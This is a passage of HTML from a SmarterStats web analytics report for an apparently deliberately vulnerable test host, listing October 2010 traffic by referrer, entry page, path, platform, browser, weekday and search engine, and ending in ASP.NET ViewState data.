<td class='al '><a href="http://www.way-to-success.com" target="_blank" class='ReportLink'>www.way-to-success.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '><a href="http://www2.fastdial.net" target="_blank" class='ReportLink'>www2.fastdial.net</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '><a href="http://www.google.ru" target="_blank" class='ReportLink'>www.google.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '><a href="http://support.mozilla.com" target="_blank" class='ReportLink'>support.mozilla.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar rc percentcolrc'>8</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>39</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
668</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>70</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Paths</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_Paths"> <div class='ReportChart'><img src="/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Path</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>/</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
671</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>/sales.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sitemap.aspx<BR>/<BR>/learning.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>/<BR>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscan-netsparker-report.htm<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>/images/<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>/<BR>/cloudscandetails.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>/test.aspx<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/report.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>/test.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (16)</td>
<td class='FooterTotal ar rc percentcolrc'>16</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>27</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/20226bc24c8e4c89926647164054826e.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
677</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
374</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
6,097</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
53</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
177</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
148</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
3,211</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
25</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
68,935</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
95</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,451</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,599</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
92</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
32</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
18</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
527</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Mac OS 10.6</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
148</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>Win 2003</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
21</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (6)</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>15</td>
<td class='FooterTotal ar percentcol'>368</td>
<td class='FooterTotal ar rc percentcolrc'>2</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>4,381</td>
<td class='FooterAverages ar percentcol'>49</td>
<td class='FooterAverages ar percentcol'>5,077</td>
<td class='FooterAverages ar rc percentcolrc'>293</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/1d4802d431604203a5254435a7181b01.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
626</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
508</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
9,680</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
74</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
69,210</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
144</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,552</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,608</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
52</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
49</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
63</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
10</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
8</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
248</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
289</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
83</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>7,010</td>
<td class='FooterAverages ar percentcol'>79</td>
<td class='FooterAverages ar percentcol'>8,123</td>
<td class='FooterAverages ar rc percentcolrc'>469</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Monthly Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_Monthly_Totals"> <div class='ReportChart'><img src="/Temp/91331a080c0148b0bddd5d75991acb5b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Month</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>October, 2010</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
70,352</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
1,012</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
84,873</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,725</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,352</td>
<td class='FooterTotal ar percentcol'>1,012</td>
<td class='FooterTotal ar percentcol'>84,873</td>
<td class='FooterTotal ar rc percentcolrc'>4,725</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>70,352</td>
<td class='FooterAverages ar percentcol'>1,012</td>
<td class='FooterAverages ar percentcol'>84,873</td>
<td class='FooterAverages ar rc percentcolrc'>4,725</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Weekday Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_DOW_Totals"> <div class='ReportChart'><img src="/Temp/5bf056fa42644067bd0099f9d59829e2.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Week Day</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>Sunday</td>

<td class='ar percentcol '>
<div class='percent percent19'></div>
28,509</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
109</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
30,005</td>
<td class='ar percentcol rc'>
<div class='percent percent20'></div>
1,914</td>
</tr>
<tr class="alt">
<td class='al lc'>Monday</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
37,279</td>
<td class='ar percentcol '>
<div class='percent percent18'></div>
98</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
38,813</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
2,474</td>
</tr>
<tr >
<td class='al lc'>Tuesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
116</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,605</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
11</td>
</tr>
<tr class="alt">
<td class='al lc'>Wednesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
120</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1,454</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
15</td>
</tr>
<tr >
<td class='al lc'>Thursday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
451</td>
<td class='ar percentcol '>
<div class='percent percent25'></div>
131</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
2,015</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr class="alt">
<td class='al lc'>Friday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
149</td>
<td class='ar percentcol '>
<div class='percent percent23'></div>
123</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,872</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr >
<td class='al lc'>Saturday</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
3,481</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
135</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
5,471</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
245</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>10,015</td>
<td class='FooterAverages ar percentcol'>113</td>
<td class='FooterAverages ar percentcol'>11,605</td>
<td class='FooterAverages ar rc percentcolrc'>671</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Search Engine Breakdown</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="SEO_Engines"> <div class='ReportChart'><img src="/Temp/8494271a59234d898cdd787b473092ed.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Search Engine</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Google</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Yandex</td>

<td class='ar percentcol rc'>
<div class='percent percent17'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>5</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>2</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|/wEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhwCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o+jgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwkGAABowSlcoQkeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8MBQxTbWFydGVyVG9vbHMfCmgfCAYAQMr4o+jgBx8GBRMyMDEwLTEwLTAzLTAwLTAwLTAwZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCA